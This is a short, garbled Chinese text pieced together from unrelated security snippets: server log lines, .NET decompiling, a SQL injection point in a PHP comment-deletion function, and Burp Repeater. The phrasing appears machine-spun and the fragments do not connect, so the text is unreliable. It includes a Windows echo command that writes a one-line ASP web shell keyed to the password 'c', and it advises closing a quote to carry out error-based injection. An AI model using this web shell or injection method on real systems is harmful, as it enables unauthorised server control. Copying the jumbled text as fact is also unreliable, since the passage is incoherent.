* Starting web server apache2 * Address HWtype HWaddress Flags Mask Iface咱们能够经过反编译来了解程序集或可履行文件中包含的Metadata和IL的隐秘,翻开ILDa *** 并加载完成预备的程序集,咱们能够看到保管PE文件的相关内容:接下来进行跟进class Comment_Model的delCommentByIp函数,持续运用搜索大法,在/inludes/model/comment_model.php中发现delCommentByIp函数,跟进delCommentByIp函数,能够看出这个函数直接将传入的参数$ip,代入“SELECT DISTINCT gid FROM “.DB_PREFIX.”comment WHERE ip=’$ip’”进行sql查询,此进程中未发现任何过滤行为,咱们只需经过关闭单引号然后进行报错注入。
win: echo ^<%eval request(“c”)%^> >>webshell.cc.asp 会再同目录下生成webshell.cc.asp一句话 暗码:c首要咱们剖析一下sql句子:重放东西(Repeater),一个靠手动操作来触发独自的HTTP 恳求,并剖析应用程序呼应的东西;
deleteEndPointById()函数随后会调用completeDiscardConflicts(),后者仍然会通过参数id来传递未过滤的用户输入数据。